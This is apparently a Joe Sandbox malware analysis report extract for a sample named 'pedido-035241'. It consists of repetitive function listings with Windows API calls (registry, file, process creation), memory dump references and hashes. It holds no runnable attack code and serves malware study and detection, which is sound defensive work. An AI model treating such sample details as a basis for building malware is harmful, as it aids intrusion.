                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: PrivateProfileStringWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 390214022-0
                                                                                                                                                                            • Opcode ID: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                            • Instruction ID: de4cb5ca612a6b97b91745c8380e1d92b079ec7b797fcdaf288f77766e75fad7
                                                                                                                                                                            • Opcode Fuzzy Hash: 498f41ba95d1dc934bc83887be66b3af98def7cf3aba53834c7129a1bd888199
                                                                                                                                                                            • Instruction Fuzzy Hash: FAE04F31900124BBDF603AB11F8DEAE205C6FC6744B18013EF911BA1C2E9FC8C4146AD
                                                                                                                                                                            Function 004063A2 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402E57,00000000,?,?), ref: 004063CB
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                            • Instruction ID: 33fcb2899acb2d8a51dea3519172d90e3aaf79576ce2bf617fe5633813c3fc69
                                                                                                                                                                            • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 40E0BF72010109BEDF195F50ED0AD7B3A1DE704300F01452EB906D4051E6B5A9306664
                                                                                                                                                                            Function 0040607A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004034AC,00000000,00000000,00403303,000000FF,00000004,00000000,00000000,00000000), ref: 0040608E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                            • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                            • Instruction ID: c8e4d841af9964a9af1d27d101842a5e1860e0780d1899a5c61b78fe641b59a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                                                                                                                                            • Instruction Fuzzy Hash: 84E08632140219ABCF10EE518C00EEB379CFF01390F054432F911E2140D638E92187A4
                                                                                                                                                                            Function 004060A9 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040347A,00000000,00414EC0,?,00414EC0,?,000000FF,00000004,00000000), ref: 004060BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FileWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3934441357-0
                                                                                                                                                                            • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                            • Instruction ID: 36c6d552b97af02dd58307b05a598db1695570393df740455f8c701413f3969e
                                                                                                                                                                            • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                            • Instruction Fuzzy Hash: AFE0E632150169ABDF10DE559C00EEB775CEB05351F014476F955E3150DA31E87197A5
                                                                                                                                                                            Function 00406374 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,00406402,?,00000000,?,?,: Completed,?), ref: 00406398
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Open
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 71445658-0
                                                                                                                                                                            • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                            • Instruction ID: 95f024e915835d806257714b27b18acfdec26fcf9bd71fa5ecdde53cd8054228
                                                                                                                                                                            • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                            • Instruction Fuzzy Hash: 00D0123210030DBBDF11AF90DD01FAB3B1DAB08310F014436FE06A5091D776D530AB64
                                                                                                                                                                            Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                            • Opcode ID: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction ID: dab120aab1e819a0f3e7a590800bcc330433e48d8fa1e5c71f26214da8b737bd
                                                                                                                                                                            • Opcode Fuzzy Hash: 9ed813dc5e0ae011bbb39e354fb2185b2751a29f1249f91cdd763d9aa28b90ef
                                                                                                                                                                            • Instruction Fuzzy Hash: B4D01272B08110DBDB11DBA8AA48B9D72A4AB50364B208537D111F61D0E6B9C5559619
                                                                                                                                                                            Function 00404463 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00406544: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 004066E9
                                                                                                                                                                              • Part of subcall function 00406544: lstrlenW.KERNEL32(: Completed,00000000,Completed,?,004055A0,Completed,00000000), ref: 00406743
                                                                                                                                                                            • SetDlgItemTextW.USER32(?,?,00000000), ref: 0040447D
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemTextlstrcatlstrlen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 281422827-0
                                                                                                                                                                            • Opcode ID: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                            • Instruction ID: a894ff31b73895be19cc099c8c24ae83fb845b4aca8af963ae3db1ea54c4578e
                                                                                                                                                                            • Opcode Fuzzy Hash: 26cd6fd2a30a9edae1afc01185c8e6693b4f27573a3b41b2952906fd053f54dd
                                                                                                                                                                            • Instruction Fuzzy Hash: F6C08C31048200BFD281A704CC42F1FF3E8EF9031AF00C42EB15CE00D1C63494208A26
                                                                                                                                                                            Function 004044AF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044C1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                            • Instruction ID: 22c14ff0de7d99e8655fd7423acc63eaa31bea8074cc9abcc6b2c74ee929f0f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 74117c3da1d14bbcbc4f92c0e0eb3ebd0fff66770c46117da5e433d52de2638c
                                                                                                                                                                            • Instruction Fuzzy Hash: 54C09B71740706BBEE608F519D49F1777586750700F298579B755F60D0C674E410DA1C
                                                                                                                                                                            Function 00404498 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3850602802-0
                                                                                                                                                                            • Opcode ID: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                            • Instruction ID: a70792fcf8e9dbddb4bc54a752e2f47ec30058e0f009e109d264f56951a5bac9
                                                                                                                                                                            • Opcode Fuzzy Hash: 3ca17ea631bf80887aa3d9427a31a3d2622a0e2ccdc50664b5f44c823975825e
                                                                                                                                                                            • Instruction Fuzzy Hash: 28B09236281A00EBDE614B00EE09F457A62A768701F008468B641240B0CAB240A5DB19
                                                                                                                                                                            Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                            • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                            • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                            • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                            Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                            • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                            • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                                                                                            • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                            • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                                                                                                                            Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                              • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                              • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                              • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                              • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                              • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                              • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                              • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                                                                                                                                              • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
                                                                                                                                                                              • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1767234749.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1767216652.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767257386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767273614.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1767408008.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pedido-035241.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2972824698-0
